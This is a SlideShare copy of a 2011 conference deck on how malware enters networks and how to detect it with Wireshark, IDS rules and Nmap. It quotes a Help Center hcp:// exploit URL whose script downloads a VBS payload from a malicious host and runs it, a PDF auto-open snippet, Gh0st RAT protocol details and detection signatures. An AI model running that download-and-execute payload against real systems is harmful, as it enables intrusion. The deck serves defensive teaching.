SlideShare uma empresa Scribd logo

Taming worms, rats, dragons & more

Christiaan Beek
Christiaan Beek

Presentation around malware on your network and how to detect them with open-source tools. Presented during BlackHat Abu DHabi 2011

Tecnologia
1 de 79
An Intel company ‘Taming Worms, RATs, Dragons,tjombies & More….’ By Christiaan Beek
Agenda An Intel company • whoami • The game has changed • How malware enters your network • What goes wrong • Wireshark Kung-Fu • Countermeasures • Resources & credits • Wrap up LEGO® is a trademark of the LEGO Group of companies which does not sponsor, authorize or endorse this presentation.
> whoami An Intel company • Christiaan Beek • Principal Architect • Foundstone EMEA IR & Forensics • Developer/Instructor MFIRE
The game has changed An Intel company MANU- MEDICAL FACTURING DEVICE ENERGY DATABASE SCADA MOBILE EMBEDDED RSA DuQu SILICON SMART CARS NIGHT DRAGON STUXNET SOCIAL AURORA ZEUS MEDIA ATM/KIOSK APPS ENTERTAINMENT VIRTUAL RF/IR WEB BLUETOOTH
The game has changed Total Malware Samples 70,000,000 60,000,000 50,000,000 40,000,000 30,000,000 20,000,000 10,000,000 0 McAfee threat landscape Q2 report
The game has changed An Intel company
Some statistics An Intel company The Gulf region gains interest by malware authors: • Number of internet users growing • Windows XP most used OS • Vulnerable IE or PDF readers
Some statistics An Intel company Did you know: • Internet Explorer 6 has more than 473 public known vulnerabilities • So…..
Some statistics An Intel company http://www.ie6countdown
Some statistics An Intel company Unpatched Windows XP + IE 6 =
Some statistics An Intel company Gulf region Malware spread vs Global Source: ThreatExpert & McAfee labs
Some statistics – Most detected malware An Intel company Iran Iraq: Lebanon: Jordan: Backdoor.Win32.Rbot Gen.Application Virus.Win32.Virut.ce Backdoor.Trojan Mal/VBInject-D Mal/VB-G W32.Virut.CF Generic PWS.y P2P-Worm.Win32.Malas.h Malware.Virut W32/Scribble-B Infostealer.Snatch Trojan-PWS. PWS-RedNeck W32/Virut.n.gen Trojan- Win32.Sality. Trojan-Dropper Win32.SuspectCrc Downloader.Win32.VB.tty Win32.Virut.Gen. Trojan- Trojan- Worm.P2P.Malas Spy.Win32.Agent.awkh Israel: PSW.Win32.FakeAIM.e Worm:Win32/Autorun.NI W32/Scribble-B Backdoor.Win32.IRCBot.hjd TSPY_FAKEAIM.E Trojan.FakeAlert VirTool.Win32.AttackerDow Oman W32/Koobface.worm.gen n.11 Backdoor.Win32 Kuwait: W32/Sdbot.worm W32/Virut.n.gen Trojan- Backdoor.Evilbot W32/Spybot.worm.gen GameThief.Win32.Lmir P2P-Worm.Win32.SpyBot.gen Win32.Sality Syria: Trojan-Spy.Win32.Banker.gaa W32.Spybot.Worm Win32.Virut.Gen Worm.Akbot.Gen Trojan-Spy.Win32.Banbra Virus.Win32.Parite.b Worm.RBot.Gen.16 Virus.Win32.Alman.b Virus.Win32.Sality.r WORM_AUTORUN.XA United Arab Emirates Virus.Win32.Sality.l Virus.Win32.Virut.ce Saudi Arabia: Backdoor.Win32.VB.fhx Virus.Win32.Virut W32.Gammima.AG Backdoor.IRC.Bot HackTool.VB!sd6 W32/Autorun.worm W32.Spybot.Worm Malware.Harakit Trojan-Dropper.Agent W32/Sality-AI Malware.Virut Yemen TrojanDropper:Win32/VB.HE W32/Virut.n.gen PE_PARITE.A Backdoor.Win32.Cakl.a Trojan-PWS.Win32.VB WORM_AUTORUN.YN W32/Autorun.worm IRC Trojan TrojanSpy:Win32/Vwealer.CG W32/Mabezat Source: ThreatExpert & Mal/TinyDL-T Virus.Win32.Sality W32/Sality.gen McAfee labs Trojan.IRCBot Worm.IM.Sohanad W32/ZBot Trojan.Win32.Vilsel.sxw
Some statistics – Most detected malware An Intel company "The next slide contains scenes that some color-blind people may find disturbing"
Some statistics – Most detected malware An Intel company Iran Iraq: Lebanon: Jordan: Backdoor.Win32.Rbot Gen.Application Virus.Win32.Virut.ce Backdoor.Trojan Mal/VBInject-D Mal/VB-G W32.Virut.CF Generic PWS.y P2P-Worm.Win32.Malas.h Malware.Virut W32/Scribble-B Infostealer.Snatch Trojan-PWS. PWS-RedNeck W32/Virut.n.gen Trojan- Win32.Sality. Trojan-Dropper Win32.SuspectCrc Downloader.Win32.VB.tty Win32.Virut.Gen. Trojan- Trojan- Worm.P2P.Malas Spy.Win32.Agent.awkh Israel: PSW.Win32.FakeAIM.e Worm:Win32/Autorun.NI W32/Scribble-B Backdoor.Win32.IRCBot.hjd TSPY_FAKEAIM.E Trojan.FakeAlert VirTool.Win32.AttackerDow Oman W32/Koobface.worm.gen n.11 Backdoor.Win32 Kuwait: W32/Sdbot.worm W32/Virut.n.gen Trojan- Backdoor.Evilbot W32/Spybot.worm.gen GameThief.Win32.Lmir P2P-Worm.Win32.SpyBot.gen Win32.Sality Syria: Trojan-Spy.Win32.Banker.gaa W32.Spybot.Worm Win32.Virut.Gen Worm.Akbot.Gen Trojan-Spy.Win32.Banbra Virus.Win32.Parite.b Worm.RBot.Gen.16 Virus.Win32.Alman.b Virus.Win32.Sality.r WORM_AUTORUN.XA United Arab Emirates Virus.Win32.Sality.l Virus.Win32.Virut.ce Saudi Arabia: Backdoor.Win32.VB.fhx Virus.Win32.Virut W32.Gammima.AG Backdoor.IRC.Bot HackTool.VB!sd6 W32/Autorun.worm W32.Spybot.Worm Malware.Harakit Trojan-Dropper.Agent W32/Sality-AI Malware.Virut Yemen TrojanDropper:Win32/VB.HE W32/Virut.n.gen PE_PARITE.A Backdoor.Win32.Cakl.a Trojan-PWS.Win32.VB WORM_AUTORUN.YN W32/Autorun.worm IRC Trojan TrojanSpy:Win32/Vwealer.CG W32/Mabezat Mal/TinyDL-T Virus.Win32.Sality W32/Sality.gen Trojan.IRCBot Worm.IM.Sohanad W32/ZBot Trojan.Win32.Vilsel.sxw
What happened in Qatar? An Intel company Source: http://blogs.technet.com/b/security/archive/2011/11/22/the-curious-case-of-qatar.aspx
An Intel company
How malware enters your network An Intel company Hint: ‘ it is between the keyboard and the chair ’
How malware enters your network An Intel company Top infection vectors: • Users browsing websites which have been infected with no outward sign of the compromise • Open attachments • Or:
How malware enters your network An Intel company User clicks on link
How malware enters your network An Intel company OR… User opens a PDF
How malware enters your network An Intel company With a little effort…… # Create a simple PDF document with Origami contents = ContentStream.new contents.write ‘Black Hat Sneak Peek', :x => 350, :y => 750, :rendering => Text::Rendering::STROKE, :size => 15 PDF.new.append_page(Page.new.setContents(contents)).save(‘Sneak peek.pdf') pdf = PDF.read(“Sneak peek.pdf") pdf.onDocumentOpen Action::URI.new('http://securitybananas.com') pdf.save(‘Sneak peek bhatpdf')
How malware enters your network An Intel company After x redirects: script executed: grab info
How malware enters your network An Intel company hcp://services/search?query=anything&topic=hcp:// system/sysinfo/sysinfomain.htm%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A..%5C..%5Csysinfomain.htm%u003fsvr=<script defer>eval(Run(String.fromCharCode(99,109,100,32,47 ,99,32,101,99,104,111,32,66,61,34,108,46,118,98,115,3 4,58,87,105,116,104,32,67,114,101,97,116,101,79,98,1 06,101,99,116,40,34,77,83,88,77,76,50,46,88,77,76,72, 84,84,80,34,41,58,46,111,112,101,110,
How malware enters your network An Intel company hcp://services/search?query=anything&topic=hcp://system/sysinf o/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u0 03fsvr=<script defer>eval(Run(String.fromCharCode (cmd /c echo B="l.vbs":With CreateObject ("MSXML2.XMLHTTP") :.open "GET","http://malicioushostsite.com/content/hcp_vbs.php?f=16 6::60&d=0::0",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "" + B):D.WriteLine .responseText:End With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "" + B > %TEMP%l.vbs && %TEMP%l.vbs && taskkill /F /IM helpctr.exe)))
How malware enters your network An Intel company Info sent: Browser version Operating System Adobe version Flash version Java version Etc.
How malware enters your network An Intel company var jver = [0, 0, 0, 0], pdfver = [0, 0, 0, 0], flashver = [0, 0, 0, 0]; try {var PluginDetect = {handler : function (c, b, a){return function (){c(b, a)} [………….] initScript:function(){var c=this,a=navigator, e="/",i=a.userAgent| |"",g=a.vendor||"",b=a.platform||"",h=a.product||" ";c.OS=100;if(b){var f,d=["Win",1,"Mac",2,"Linux",3,"FreeBSD",4, "iPhone",21.1,"iPod",21.2, "iPad",21.3,"Win. * CE",22.1,"Win. * Mobile",22.2,"Pocket s * PC",22.3,"
How malware enters your network An Intel company Info gathered: Browser version Operating System Adobe version Flash version Java version Etc.
How malware enters your network An Intel company
How malware enters your network An Intel company C&C server
How malware traffic is hiding An Intel company ► Techniques used to hide traffic: • Disguising malicious traffic as web traffic • Shortened or encoded URLs • IRC over http
An Intel company ► Techniques used to hide traffic:
What goes wrong? An Intel company
Problem #1 An Intel company ► many solutions but how to use them? ► education?
Problem #2 An Intel company ► No Malware strategy ► Focus on the end-point ► but what is your end-point nowadays?
Problem #3 An Intel company ► No layered (malware) defense ► Traffic streams unclear
Problem #4 An Intel company ► How does malware work? ► How to recognize patterns & correlate?
So.... An Intel company
Wireshark Kung-Fu An Intel company
Custom /targeted malware An Intel company ► Some recent samples of malware: • spreading: shares, USB-media, .exe infections • Search for Autocomplete information • Search for specific accounts • Keylogger • Created task to check if keylogger was running • Masked in dll files • Upload results to ftp servers
Custom /targeted malware An Intel company ► IEAutocomplete: Type: 89c39569 Subtype: 0xf111f3e Unknown: 89c39569: [IdentitiesPass]=[,,,,$#„#Œ] Type: e161255a Subtype: 0xe161255a IE AutoComplete: [address]=[Street ********* ,] IE AutoComplete: [ini_tmp]=[pa*******] IE AutoComplete: [name]=[p********] IE AutoComplete: [num]=[01*********] IE AutoComplete: [p0]=[******ADMIN] IE AutoComplete: [rech]=[SY*******] IE AutoComplete: [username]=[22*********]
Custom /targeted malware An Intel company ► As mentioned before, traffic is hidden using: • http(s) • ftp (traffic increase) • irc • Tcp 445 (traffic increase) • Tcp 53 (DNS) • Compression of traffic Used for downloading payload, uploading information, command & control
Custom /targeted malware An Intel company ► Arming for detection
Wireshark An Intel company Which filters can be used? First: tcp.dstport = =80 and http contains “GET” After analyzing this output fine-tuning filter: tcp.dstport == 80 and http contains "GET" and ip.dst_host == 67.2**.***.***
Wireshark An Intel company ►Which filters can be used? DNS queries: dns contains “ru” or dns contains “cn” or dns contains “biz” or dns contains “dyndns.org or dns contains cc”
T-shark An Intel company ►T-shark: command line:
Wireshark An Intel company ►Example of Morto:
Custom /targeted malware An Intel company ► Chinese Gh0st RAT • Full analysis by Foundstone’s Michael G.Spohn • example of Chinese RAT used in several campaigns • research project to understand working
Custom /targeted malware An Intel company ► Chinese Gh0st RAT
Custom /targeted malware An Intel company ► Network analysis of Chinese Gh0st RAT • Command & Control (C2) packets consists of: 1. A five byte packet header - contains the characters ‘Gh0st’. 2. A four byte integer that contains the size in bytes of the entire packet. 3. A four byte integer that contains the size in bytes of the entire packet when uncompressed. 4. A variable sized packet that contains the packet payload. The client sends small requests that contain commands, and the server responds to those commands with the requested data.
Custom /targeted malware An Intel company ► example of commands • 50 commands used
Custom /targeted malware An Intel company ► example of token codes • Used by server to identify payloads to client
Custom /targeted malware An Intel company ► example of login packet
Custom /targeted malware An Intel company ► uncompressing the login payload: First byte 66 (0x66 = 102)
Custom /targeted malware An Intel company ► lookup 102 in RAT’s command value table:
Custom /targeted malware An Intel company ► uncompressing the login payload: C0 A8 01 E0 = 192.168.1.249 (host ip-address)
Custom /targeted malware An Intel company ► uncompressing the login payload: ’01’ – in this case means a webcam is present on client
Custom /targeted malware An Intel company ► For the RE die-hards: Gh0st RAT LoginInfo structure
Wireshark filter An Intel company ► Chinese Gh0st RAT - filter: “x47x68x30x73x74” -Gh0st
Wireshark An Intel company ► NETBIOS traffic
Wireshark An Intel company ► Traffic regarding TCP 445 traffic (shares, smb) Incoming file share access attempts: ((smb.cmd && ip.dst > internal network address) || (smb.cmd && ip.dst < internal network broadcast address))
Wireshark An Intel company ►SMB worm creating .exe on share: smb.create.action == 2 and smb.file contains "exe"
Wireshark An Intel company ► SMB .exe detection: In old days: smb.file contains "exe"
Wireshark An Intel company ► SMB .exe detection: Taddong developed a tool to capture smb in Wireshark But… good news It’s now integrated in Wireshark Version 1.5.1 (Dev)
Wireshark An Intel company ► SMB .exe detection: File > Export > objects > SMB
Wireshark An Intel company ► SMB .exe detection:
Wireshark An Intel company DEMO
An Intel company COUNTERMEASURES
An Intel company Training & Education!!!!!
Countermeasures An Intel company
Countermeasures An Intel company ► Implement IDS rules to monitor/report RDP and VNC protocol use (particularly from the internet): RDP = "|43 6f 6f 6b 69 65 3a 20 6d 73 74 73 68 61 73 68|“ TPKT (RDP) = "|03 00 00 0b 06 e0|"; "|b8 e5 0d 3d 16 00|“ VNC = "|52 46 42 20 30 30 33 2e 30 30|"
Countermeasures An Intel company ► Implement IDS rules to monitor for CMD shell usage over the network from the internet or across firewalls: CMD = "|0a 0a|C|3a 5c|"; "|0a 0a|C|3a 5c|WINDOWS|5c|"; ► Implement new signatures in IDS/DLP as they are learned
Countermeasures An Intel company ► Detect services on non-standard ports ► Nmap the internal network: nmap -sS -p <ports> -oG results.nmap <IP or subnet range>
Countermeasures An Intel company ► Detect services on non-standard ports ► Probe discovered ports with Amap amap -A -b -o out.amap <IP> <port> <port> ... or use the results.nmap file as input
Countermeasures An Intel company ► Implement IDS/HIPS/DLP rules to detect outbound GET requests: Files by type (.exe, .bat, .dll etc.) in URL GET http://scan28.dosmokes.ce.ms/ InstallSystemDefender_133.bin HTTP/1.0 GET http://webmoviefiles.in/DownloaderThe.Queen.of.Fighters.450 94.exe HTTP/1.1
Countermeasures An Intel company ► Implement IDS/HIPS/DLP rules to detect Encoded URL extensions: GET http://220407db0435.thoseros.com/get2.php?c=PXWSQSZT&d=26606B67393230312E6 4636F317E3E3D2120222724243078747D456E7579232843471710111510015D404E166 E6F1F6C06740A00050701750C787B7A0504080876787777777377707C0C0C0E6A2F2 7212634206E656D637130303E66386B3F6E575003534204020A55584C041F1B0B1D4D 442D42522A021413444A4B4E4E4F4FB7B8B2B5A2F5F4E8EBB4CFF3FCE1E1FDF5E3 BCD6CCD0B0FBFCA8C5FEA1ADB8FCCCCFD6FCC1989 781DF9F9E969C8BCDC1D4 DD8FE6E7858686FCFBFB8DFE888D8AF5EFA3AEEAB6A9A9B1E7A9A4A1EBA7ABB1 A5B7EEE5E6E6E6EFEBEDEBEAE8F89AAFB3 HTTP/1.1
Countermeasures An Intel company ► Implement IDS/HIPS/DLP rules to detect MIME/Base64-encoded URL extensions GET http://65.75.156.141/Home/d.php?f=16&e=about.ex e HTTP/1.1 GET http://65.75.156.141/Home/d.php?f=MTYmZT1hYm 91dC5leGU== HTTP/1.1
Wrap up An Intel company ► What have you learned? • the game has changed • malware uses all kind of ways to hide it selves • Many tools to detect malware • but…. • invest in learning the tools and how malware works • define a defense-in-depth malware strategy • create awareness • educate administrators AND Management AND users
Resources & credits An Intel company ► Resources • Wireshark (http://www.wireshark.org) • Snort (http://www.sourcefire.com) • Nmap – (http://www.insecure.org) • Amap – (http://www.thc.org/thc-amap/) ► Special thanks to • Michael G. Spohn • Shane Shook • Tony Lee • Carric Dooley
Shukran/Thank you! An Intel company ► Keep in touch: • Christiaan_Beek @McAfee dot com ► Twitter: • @FSEMEA • @Foundstone • @ChristaanBeek

Recomendados

IQT 2010 - The App Does That!?
IQT 2010 - The App Does That!?IQT 2010 - The App Does That!?
IQT 2010 - The App Does That!?
Tyler Shields
 
Shmoocon 2010 - The Monkey Steals the Berries
Shmoocon 2010 - The Monkey Steals the BerriesShmoocon 2010 - The Monkey Steals the Berries
Shmoocon 2010 - The Monkey Steals the Berries
Tyler Shields
 
Maritime cyber security threats &amp; consequence part 2
Maritime cyber security threats &amp; consequence part 2Maritime cyber security threats &amp; consequence part 2
Maritime cyber security threats &amp; consequence part 2
pankaj kapoor
 
Cyber Crime - Who do you call?
Cyber Crime - Who do you call?Cyber Crime - Who do you call?
Cyber Crime - Who do you call?
East Midlands Cyber Security Forum
 
Botnet
BotnetBotnet
Botnet
lokenra
 
IRJET- A Survey on Android Ransomware and its Detection Methods
IRJET- A Survey on Android Ransomware and its Detection MethodsIRJET- A Survey on Android Ransomware and its Detection Methods
IRJET- A Survey on Android Ransomware and its Detection Methods
IRJET Journal
 
Advanced Malware Analysis
Advanced Malware AnalysisAdvanced Malware Analysis
Advanced Malware Analysis
Prathan Phongthiproek
 
3871778
38717783871778
3871778
Christiaan Beek
 

Recomendados

IQT 2010 - The App Does That!?
IQT 2010 - The App Does That!?IQT 2010 - The App Does That!?
IQT 2010 - The App Does That!?
Tyler Shields
 
Shmoocon 2010 - The Monkey Steals the Berries
Shmoocon 2010 - The Monkey Steals the BerriesShmoocon 2010 - The Monkey Steals the Berries
Shmoocon 2010 - The Monkey Steals the Berries
Tyler Shields
 
Maritime cyber security threats &amp; consequence part 2
Maritime cyber security threats &amp; consequence part 2Maritime cyber security threats &amp; consequence part 2
Maritime cyber security threats &amp; consequence part 2
pankaj kapoor
 
Cyber Crime - Who do you call?
Cyber Crime - Who do you call?Cyber Crime - Who do you call?
Cyber Crime - Who do you call?
East Midlands Cyber Security Forum
 
Botnet
BotnetBotnet
Botnet
lokenra
 
IRJET- A Survey on Android Ransomware and its Detection Methods
IRJET- A Survey on Android Ransomware and its Detection MethodsIRJET- A Survey on Android Ransomware and its Detection Methods
IRJET- A Survey on Android Ransomware and its Detection Methods
IRJET Journal
 
Advanced Malware Analysis
Advanced Malware AnalysisAdvanced Malware Analysis
Advanced Malware Analysis
Prathan Phongthiproek
 
3871778
38717783871778
3871778
Christiaan Beek
 
Cyber threats landscape and defense
Cyber threats landscape and defenseCyber threats landscape and defense
Cyber threats landscape and defense
fantaghost
 
Ransomware by lokesh
Ransomware by lokeshRansomware by lokesh
Ransomware by lokesh
Lokesh Bysani
 
Spyware presentation by mangesh wadibhasme
Spyware presentation by mangesh wadibhasmeSpyware presentation by mangesh wadibhasme
Spyware presentation by mangesh wadibhasme
Mangesh wadibhasme
 
quick-heal-threat-report-q2-2023.pdf
quick-heal-threat-report-q2-2023.pdfquick-heal-threat-report-q2-2023.pdf
quick-heal-threat-report-q2-2023.pdf
QUICK HEAL TECHNOLOGIES LIMITED
 
quick-heal-threat-report-q2-2023.pdf
quick-heal-threat-report-q2-2023.pdfquick-heal-threat-report-q2-2023.pdf
quick-heal-threat-report-q2-2023.pdf
QUICK HEAL TECHNOLOGIES LIMITED
 
V!R0L0gy - Malwares vs Glitch Art
V!R0L0gy - Malwares vs Glitch ArtV!R0L0gy - Malwares vs Glitch Art
V!R0L0gy - Malwares vs Glitch Art
Domenico Barra
 
READ - Risk Exposure Awareness and Deflection - creating an organization-wide...
READ - Risk Exposure Awareness and Deflection - creating an organization-wide...READ - Risk Exposure Awareness and Deflection - creating an organization-wide...
READ - Risk Exposure Awareness and Deflection - creating an organization-wide...
Global Risk Forum GRFDavos
 
Malware in Mobile Platform from Panoramic Industrial View
Malware in Mobile Platform from Panoramic Industrial ViewMalware in Mobile Platform from Panoramic Industrial View
Malware in Mobile Platform from Panoramic Industrial View
Antiy Labs
 
Cyber crimes (By Mohammad Ahmed)
Cyber crimes (By Mohammad Ahmed)Cyber crimes (By Mohammad Ahmed)
Cyber crimes (By Mohammad Ahmed)
Mohammad Ahmed
 
Remote access trojan
Remote access trojanRemote access trojan
Remote access trojan
ssuser1eca7d
 
NewsByte Mumbai October 2017
NewsByte Mumbai October 2017NewsByte Mumbai October 2017
NewsByte Mumbai October 2017
chauhananand17
 
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionScaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Wayne Huang
 
TRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasTRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , Texas
Aditya K Sood
 
BPS-DellWorld
BPS-DellWorldBPS-DellWorld
BPS-DellWorld
Anne Bonaparte
 
Types of Malware (CEH v11)
Types of Malware (CEH v11)Types of Malware (CEH v11)
Types of Malware (CEH v11)
EC-Council
 
Dark side presentation lwhippedtc515
Dark side presentation lwhippedtc515Dark side presentation lwhippedtc515
Dark side presentation lwhippedtc515
lisawhipp
 
Battling Malware In The Enterprise
Battling Malware In The EnterpriseBattling Malware In The Enterprise
Battling Malware In The Enterprise
Ayed Al Qartah
 
Cyber ppt
Cyber pptCyber ppt
Cyber ppt
Mandar Pathrikar
 
Meet the potnet - AboutAndroid | Malware Analysis Report
Meet the potnet - AboutAndroid | Malware Analysis ReportMeet the potnet - AboutAndroid | Malware Analysis Report
Meet the potnet - AboutAndroid | Malware Analysis Report
Eran Goldstein
 
trojon horse Seminar report
trojon horse Seminar report trojon horse Seminar report
trojon horse Seminar report
NamanKikani
 
We-built-a-honeypot-and-p4wned-ransomware-developers-too
We-built-a-honeypot-and-p4wned-ransomware-developers-tooWe-built-a-honeypot-and-p4wned-ransomware-developers-too
We-built-a-honeypot-and-p4wned-ransomware-developers-too
Christiaan Beek
 
"Giving the bad guys no sleep"
"Giving the bad guys no sleep""Giving the bad guys no sleep"
"Giving the bad guys no sleep"
Christiaan Beek
 

Mais conteúdo relacionado

Semelhante a Taming worms, rats, dragons & more

Spyware presentation by mangesh wadibhasme
Spyware presentation by mangesh wadibhasmeSpyware presentation by mangesh wadibhasme
Spyware presentation by mangesh wadibhasme
Mangesh wadibhasme
 
Malware in Mobile Platform from Panoramic Industrial View
Malware in Mobile Platform from Panoramic Industrial ViewMalware in Mobile Platform from Panoramic Industrial View
Malware in Mobile Platform from Panoramic Industrial View
Antiy Labs
 
Cyber crimes (By Mohammad Ahmed)
Cyber crimes (By Mohammad Ahmed)Cyber crimes (By Mohammad Ahmed)
Cyber crimes (By Mohammad Ahmed)
Mohammad Ahmed
 
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionScaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Wayne Huang
 
TRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasTRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , Texas
Aditya K Sood
 
Battling Malware In The Enterprise
Battling Malware In The EnterpriseBattling Malware In The Enterprise
Battling Malware In The Enterprise
Ayed Al Qartah
 

Semelhante a Taming worms, rats, dragons & more (20)

Cyber threats landscape and defense
Cyber threats landscape and defenseCyber threats landscape and defense
Cyber threats landscape and defense
 
Ransomware by lokesh
Ransomware by lokeshRansomware by lokesh
Ransomware by lokesh
 
Spyware presentation by mangesh wadibhasme
Spyware presentation by mangesh wadibhasmeSpyware presentation by mangesh wadibhasme
Spyware presentation by mangesh wadibhasme
 
quick-heal-threat-report-q2-2023.pdf
quick-heal-threat-report-q2-2023.pdfquick-heal-threat-report-q2-2023.pdf
quick-heal-threat-report-q2-2023.pdf
 
quick-heal-threat-report-q2-2023.pdf
quick-heal-threat-report-q2-2023.pdfquick-heal-threat-report-q2-2023.pdf
quick-heal-threat-report-q2-2023.pdf
 
V!R0L0gy - Malwares vs Glitch Art
V!R0L0gy - Malwares vs Glitch ArtV!R0L0gy - Malwares vs Glitch Art
V!R0L0gy - Malwares vs Glitch Art
 
READ - Risk Exposure Awareness and Deflection - creating an organization-wide...
READ - Risk Exposure Awareness and Deflection - creating an organization-wide...READ - Risk Exposure Awareness and Deflection - creating an organization-wide...
READ - Risk Exposure Awareness and Deflection - creating an organization-wide...
 
Malware in Mobile Platform from Panoramic Industrial View
Malware in Mobile Platform from Panoramic Industrial ViewMalware in Mobile Platform from Panoramic Industrial View
Malware in Mobile Platform from Panoramic Industrial View
 
Cyber crimes (By Mohammad Ahmed)
Cyber crimes (By Mohammad Ahmed)Cyber crimes (By Mohammad Ahmed)
Cyber crimes (By Mohammad Ahmed)
 
Remote access trojan
Remote access trojanRemote access trojan
Remote access trojan
 
NewsByte Mumbai October 2017
NewsByte Mumbai October 2017NewsByte Mumbai October 2017
NewsByte Mumbai October 2017
 
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionScaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
 
TRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasTRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , Texas
 
BPS-DellWorld
BPS-DellWorldBPS-DellWorld
BPS-DellWorld
 
Types of Malware (CEH v11)
Types of Malware (CEH v11)Types of Malware (CEH v11)
Types of Malware (CEH v11)
 
Dark side presentation lwhippedtc515
Dark side presentation lwhippedtc515Dark side presentation lwhippedtc515
Dark side presentation lwhippedtc515
 
Battling Malware In The Enterprise
Battling Malware In The EnterpriseBattling Malware In The Enterprise
Battling Malware In The Enterprise
 
Cyber ppt
Cyber pptCyber ppt
Cyber ppt
 
Meet the potnet - AboutAndroid | Malware Analysis Report
Meet the potnet - AboutAndroid | Malware Analysis ReportMeet the potnet - AboutAndroid | Malware Analysis Report
Meet the potnet - AboutAndroid | Malware Analysis Report
 
trojon horse Seminar report
trojon horse Seminar report trojon horse Seminar report
trojon horse Seminar report
 

Mais de Christiaan Beek

Mais de Christiaan Beek (6)

We-built-a-honeypot-and-p4wned-ransomware-developers-too
We-built-a-honeypot-and-p4wned-ransomware-developers-tooWe-built-a-honeypot-and-p4wned-ransomware-developers-too
We-built-a-honeypot-and-p4wned-ransomware-developers-too
 
"Giving the bad guys no sleep"
"Giving the bad guys no sleep""Giving the bad guys no sleep"
"Giving the bad guys no sleep"
 
"There's a pot of Bitcoins behind the ransomware rainbow"
"There's a pot of Bitcoins behind the ransomware rainbow""There's a pot of Bitcoins behind the ransomware rainbow"
"There's a pot of Bitcoins behind the ransomware rainbow"
 
The 4horsemen of ics secapocalypse
The 4horsemen of ics secapocalypseThe 4horsemen of ics secapocalypse
The 4horsemen of ics secapocalypse
 
From hybernation file to malware analysis with volatility
From hybernation file to malware analysis with volatilityFrom hybernation file to malware analysis with volatility
From hybernation file to malware analysis with volatility
 
Offensive malware usage and defense
Offensive malware usage and defenseOffensive malware usage and defense
Offensive malware usage and defense
 

Último

Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
Delhi Call girls
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
Puma Security, LLC
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Igalia
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel Araújo
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
Delhi Call girls
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
Enterprise Knowledge
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
Malak Abu Hammad
 

Último (20)

Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
